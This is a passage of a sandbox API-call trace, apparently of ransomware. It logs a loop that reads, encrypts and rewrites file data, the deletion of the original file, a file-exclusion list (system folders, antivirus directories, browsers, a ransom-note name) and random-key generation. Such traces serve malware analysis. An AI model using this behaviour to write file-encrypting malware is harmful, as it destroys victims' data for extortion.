lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.783] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.783] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.783] GetLastError () returned 0x0 [0167.783] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.783] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.783] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.783] GetLastError () returned 0x0 [0167.783] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.783] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.783] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.783] GetLastError () returned 0x0 [0167.783] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.784] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.784] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.784] GetLastError () returned 0x0 [0167.784] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.784] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.784] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.784] GetLastError () returned 0x0 [0167.784] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.784] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.784] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.784] GetLastError () returned 0x0 [0167.784] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.784] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.784] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.784] GetLastError () returned 0x0 [0167.784] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.784] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.784] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.784] GetLastError () returned 0x0 [0167.784] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.784] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.784] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.784] GetLastError () returned 0x0 [0167.784] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.784] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.785] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.785] GetLastError () returned 0x0 [0167.785] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.785] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.785] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.785] GetLastError () returned 0x0 [0167.785] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.785] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.785] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.785] GetLastError () returned 0x0 [0167.785] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.785] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.785] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.785] GetLastError () returned 0x0 [0167.785] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.785] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.785] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.785] GetLastError () returned 0x0 [0167.785] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.785] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.785] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.785] GetLastError () returned 0x0 [0167.785] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.785] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.785] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.786] GetLastError () returned 0x0 [0167.786] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.786] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.786] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.786] GetLastError () returned 0x0 [0167.786] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.786] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.786] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.786] GetLastError () returned 0x0 [0167.786] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.786] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.786] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.786] GetLastError () returned 0x0 [0167.786] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.786] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.786] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.786] GetLastError () returned 0x0 [0167.786] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.786] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.786] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.786] GetLastError () returned 0x0 [0167.786] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.787] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb") returned 1 [0167.787] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb")) returned 0 [0167.787] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" [0167.787] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 1 [0167.787] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX2F3.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx2f3.tmp")) returned 0x2f3 [0167.915] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX2F3.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx2f3.tmp"), dwFlags=0x1) returned 0 [0167.915] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX2F3.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx2f3.tmp")) returned 1 [0167.915] CryptDestroyKey (hKey=0x9ad278) returned 1 [0167.915] wcslen (_String="OK") returned 0x2 [0167.915] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0167.915] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0167.915] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0167.915] CryptDestroyHash (hHash=0x9ad438) returned 1 [0167.915] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*NMCRYPT") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*Recovers your files.html") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*.exe") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*.dll") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*.lnk") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*.bat") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*.ini") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*.msi") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*.scf") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*pagefile.sys*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*NTUSER.DAT*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*AppData*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*\\winrar\\*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*\\Internet Explorer\\*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*\\java\\*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*\\TeamViewer\\*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*\\windows\\*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*\\ESET\\*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*\\AVG\\*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*\\AVIRA\\*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*\\AVAST Software\\*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*Atheros*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*Realtek*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*bootmgr*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*boot*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*boot*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*CONFIG.SYS*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*IO.SYS*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*MSDOS.SYS*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*NTDETECT.COM*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*ntldr*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*chrome*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*opera*") returned 0 [0167.916] PathMatchSpecW (pszFile="msado60.tlb", pszSpec="*firefox*") returned 0 [0167.916] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb", pszSpec="*") returned 1 [0167.916] strlen (_Str="NMoreira") returned 0x8 [0167.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.916] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 